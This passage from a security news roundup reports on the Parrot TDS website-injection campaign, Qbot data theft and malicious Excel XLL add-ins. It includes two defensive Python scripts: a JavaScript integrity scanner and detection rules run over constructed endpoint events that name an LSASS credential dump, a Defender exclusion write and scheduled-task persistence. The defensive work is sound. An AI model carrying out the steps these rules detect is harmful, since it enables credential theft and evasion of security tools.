According to the report by Kaspersky on Friday, "in many cases, wiper attacks and ransomware incidents are caused by weak network security, and it is critical to make sure that these security measures are strengthened." The firm also stated that the number of cyberattacks, including those using wipers, can be expected to grow, largely because of the unstable situation around the world.

Experts Find Malware Controlling Thousands of Websites in Parrot TDS Network

The Parrot traffic direction system (TDS) that surfaced recently has had a far larger impact than was previously thought, research suggests. The malware affected more than 61,000 websites and was one of the top infections. When Parrot TDS was first identified in April 2022 by cybersecurity company Avast, the PHP script had infected web servers hosting more than 16,500 websites, acting as a gateway for future malware campaigns. The infection appends a chunk of malicious code to every JavaScript file on the compromised web server; these servers typically host content management systems (CMS) like WordPress and are breached through weak login credentials and vulnerable plugins. 

"In 2021 alone, Sucuri said it removed Parrot TDS from nearly 20 million JavaScript files found on infected sites. In the first five months of 2022, over 2,900 PHP and 1.64 million JavaScript files have been observed containing the malware," reports The Hacker News. Alongside the use of sneaky techniques to hide the code, the "injected JavaScript may also be found well indented so that it looks less suspicious to a casual observer," said Denis Sinegubko, an expert at Sucuri. 

The aim of the JavaScript code is to jump-start the second phase of the attack: running a PHP script already injected on the server that collects information about the website visitor (for example IP address, browser and referrer) and sends the details to a remote server. The third phase is again JavaScript code that works as a traffic direction system, choosing the specific payload to send to a particular user based on the data gathered in the second stage. 

Once the TDS has confirmed that a site visitor is eligible, the NDSX script delivers the final payload through a third-party website. The most commonly used third-stage malware is a JavaScript downloader called FakeUpdates. 

"The NDSW malware campaign is extremely successful because it uses a versatile exploitation toolkit that constantly adds new disclosed and 0-day vulnerabilities. Once the bad actor has gained unauthorized access to the environment, they add various backdoors and CMS admin users to maintain access to the compromised website long after the original vulnerability is closed," said Sinegubko.
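The appended-code behaviour described in this post suggests a plain file-integrity check. The Python script below is an added example (not code from Sucuri, Avast or the original post): it hashes every .js file under a webroot while the site is known-clean, later reports files that changed, and flags as injected those that carry the ndsw/ndsx identifiers the post mentions. The demo site, its files and the stand-in injection are constructed for the example; a production scanner would use the vendor's fuller signatures.

```python
import hashlib
import os
import re
import tempfile

# Identifiers the post attributes to this campaign's stages (NDSW / NDSX); a real
# scanner would carry the vendor's fuller signatures, these are only markers.
INJECTION_MARKERS = re.compile(r"\bndsw\b|\bndsx\b", re.IGNORECASE)

def build_baseline(webroot: str) -> dict:
    """Record a SHA-256 for every .js file while the site is known to be clean."""
    baseline = {}
    for root, _, files in os.walk(webroot):
        for name in files:
            if name.endswith(".js"):
                path = os.path.join(root, name)
                with open(path, "rb") as f:
                    baseline[os.path.relpath(path, webroot)] = hashlib.sha256(f.read()).hexdigest()
    return baseline

def scan(webroot: str, baseline: dict) -> dict:
    """Classify each .js file that differs from the baseline: new, modified, injected or missing."""
    current = build_baseline(webroot)
    findings = {}
    for rel, digest in current.items():
        if rel not in baseline:
            findings[rel] = "new"
        elif digest != baseline[rel]:
            with open(os.path.join(webroot, rel), encoding="utf-8", errors="replace") as f:
                findings[rel] = "injected" if INJECTION_MARKERS.search(f.read()) else "modified"
    for rel in baseline.keys() - current.keys():
        findings[rel] = "missing"
    return findings

def demo() -> dict:
    """Constructed demo: baseline a two-file site, then append an injection to one file."""
    with tempfile.TemporaryDirectory() as webroot:
        app, vendor = os.path.join(webroot, "app.js"), os.path.join(webroot, "vendor.js")
        with open(app, "w") as f:
            f.write("function init() {\n  console.log('ok');\n}\n")
        with open(vendor, "w") as f:
            f.write("var v = 1;\n")
        baseline = build_baseline(webroot)
        # Constructed stand-in for the appended stage: a guard on the ndsw variable,
        # indented to look innocuous; the campaign's real code is not reproduced.
        with open(app, "a") as f:
            f.write("\n;if (ndsw === undefined) {\n    /* constructed stand-in */\n}\n")
        with open(vendor, "a") as f:
            f.write("var w = 2;\n")  # a legitimate edit carrying no marker
        return scan(webroot, baseline)
```

`demo()` reports app.js as injected and vendor.js as merely modified; the baseline should be stored off the web server so a compromise cannot rewrite it.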

Qbot Malware: Steals Your Data In 30 Minutes

The large-scale spread of the Qbot malware (aka QuakBot or Qakbot) has accelerated recently; according to experts, it takes only around 30 minutes to steal sensitive data after the initial infiltration. The DFIR report notes that Qbot was executing these fast data-stealing attacks in October 2021 and suggests that the hackers have now resurfaced with similar strategies. In particular, researchers believe it takes the threat actors around 30 minutes to steal browser data and Outlook emails and around 50 minutes to move to another workstation. 

The timeline suggests that Qbot moves fast: privilege escalation begins the moment infection takes place, and a full scan of the environment can take up to ten minutes. Initial access in Qbot infections is generally obtained via phishing emails carrying malicious attachments, such as Excel (XLS) documents whose macro plants a DLL loader on the victim machine. Past Qbot phishing campaigns have used a variety of infection file templates. Once launched, the Qbot DLL payload is injected into genuine Windows applications such as Mobsync.exe or MSRA.exe to avoid detection. 

For instance, the DFIR report shows Qbot being injected into MSRA.exe and then creating a scheduled task for privilege escalation. The malware also adds the Qbot DLL to Microsoft Defender's exclusion list so that it is not identified once injected into MSRA.exe. Qbot can steal emails within 30 minutes of initial deployment; these emails are later used for future phishing attacks. Experts also observed Qbot stealing Windows credentials by dumping the memory of the Local Security Authority Subsystem Service (LSASS) process and harvesting credentials from various browsers. 

The stolen credentials are later used to spread the malware laterally to other devices on the network; the malware took only 50 minutes after execution to dump credentials. Bleeping Computer reports: "Microsoft report from December 2021 captured the versatility of Qbot attacks, making it harder to evaluate the scope of its infections accurately. However, no matter how a Qbot infection unfolds precisely, it is essential to keep in mind that almost all begin with an email."
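As an added detection example (not from the DFIR report or Bleeping Computer), the Python script below runs simple rules over constructed endpoint events covering the chain just described: a process spawned by Excel, MSRA.exe or Mobsync.exe started by an unexpected parent, a scheduled task created by that process, a Defender exclusion being written, and a read of LSASS memory. It then reports, per host, which stages were seen and how many minutes elapsed from the first alert to the credential dump. The event format, host names and the sample timings are assumptions made for the example.

```python
from datetime import datetime

# Constructed endpoint telemetry, one event per line: time host kind actor rest
#   proc   <parent> <child> <args>      process creation
#   reg    <process> <key> <value>      registry value written
#   access <process> <target> <rights>  cross-process memory access
# Made-up events modelled on the chain described above; not real data.
SAMPLE_EVENTS = r"""
2022-02-01T09:00:00 WS01 proc explorer.exe excel.exe invoice.xls
2022-02-01T09:00:20 WS01 proc excel.exe msra.exe -
2022-02-01T09:02:00 WS01 proc msra.exe schtasks.exe /create /tn Update
2022-02-01T09:05:00 WS01 reg msra.exe HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\u\AppData\Local\x.dll
2022-02-01T09:50:20 WS01 access msra.exe lsass.exe PROCESS_VM_READ
2022-02-01T09:01:00 WS02 proc explorer.exe msra.exe -
"""

INJECTION_HOSTS = {"msra.exe", "mobsync.exe"}   # processes named above as injection targets
SYSTEM_PARENTS = {"explorer.exe", "services.exe", "svchost.exe"}

def stages_of(kind: str, actor: str, rest: str) -> list[str]:
    """Map one event to the attack stages it matches (possibly several, possibly none)."""
    actor, first, found = actor.lower(), rest.split()[0].lower(), []
    if kind == "proc":
        if actor == "excel.exe":                               # macro document spawning a child
            found.append("office-spawned-process")
        if first in INJECTION_HOSTS and actor not in SYSTEM_PARENTS:
            found.append("injection-host-started")
        if first == "schtasks.exe" and "/create" in rest.lower() and actor in INJECTION_HOSTS:
            found.append("scheduled-task-created")
    elif kind == "reg" and "\\exclusions\\" in rest.lower():  # Defender exclusion being written
        found.append("defender-exclusion-added")
    elif kind == "access" and first == "lsass.exe":           # credential dump via LSASS memory
        found.append("lsass-memory-access")
    return found

def correlate(text: str) -> dict:
    """Group matched stages per host and time the gap from first alert to LSASS access."""
    incidents = {}
    for line in text.strip().splitlines():
        ts, host, kind, actor, rest = line.split(maxsplit=4)
        for stage in stages_of(kind, actor, rest):
            when = datetime.fromisoformat(ts)
            inc = incidents.setdefault(host, {"first": when, "stages": [], "minutes_to_lsass": None})
            if stage not in inc["stages"]:
                inc["stages"].append(stage)
            if stage == "lsass-memory-access":
                inc["minutes_to_lsass"] = (when - inc["first"]).total_seconds() / 60
    return incidents
```

`correlate(SAMPLE_EVENTS)` yields a single incident for WS01 with all five stages and a 50-minute gap to the LSASS read, while WS02's msra.exe launched by Explorer raises nothing.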

Cyber Attackers Exploiting Microsoft Excel add-in Files

Researchers at HP Wolf Security recently published a detailed study of a new phishing campaign. According to the report, threat actors are exploiting Microsoft Excel add-in files to deliver various forms of malware onto systems, leaving businesses vulnerable to data theft, ransomware and other cybercrime. 

The researchers said that threat actors are increasingly using malicious Microsoft Excel add-in (XLL) files to compromise systems, and observed an almost six-fold (588%) increase in attacks using this technique during the final quarter of 2021 compared with the previous three months.

XLL add-in files are popular because they let users add a wide range of extra tools and functions to Microsoft Excel. But, like macros, they are a feature that threat actors can exploit. 

According to the report, threat actors distributed malicious links via phishing emails referring to payment references, quotes, invoices, shipping documents and orders, accompanied by malicious Excel documents carrying XLL add-in files. The recipient is tricked into clicking the link, which installs and activates the malicious add-in; the result can be malware execution, a frozen system as part of a ransomware attack, or the disclosure of sensitive information. 

Malware families used in attacks leveraging XLL files include Dridex, BazaLoader, IcedID, Agent Tesla, Raccoon Stealer, Formbook and BitRAT. Some of these also plant backdoors on infected Windows systems, giving attackers remote access. 

Some XLL Excel dropper services are advertised at over $2,000, which is expensive for commodity malware, yet criminal forum users seem willing to pay the price. 

Alex Holland, senior malware analyst at HP Wolf Security said, "Abusing legitimate features in the software to hide from detection tools is a common tactic for attackers, as is using uncommon file types that may be allowed past email gateways. Security teams need to ensure they are not relying on detection alone and that they are keeping up with the latest threats and updating their defenses accordingly…” 

"…Attackers are continually innovating to find new techniques to evade detection, so it's vital that enterprises plan and adjust their defenses based on the threat landscape and the business needs of their users. Threat actors have invested in techniques such as email thread hijacking, making it harder than ever for users to tell friend from foe," he added.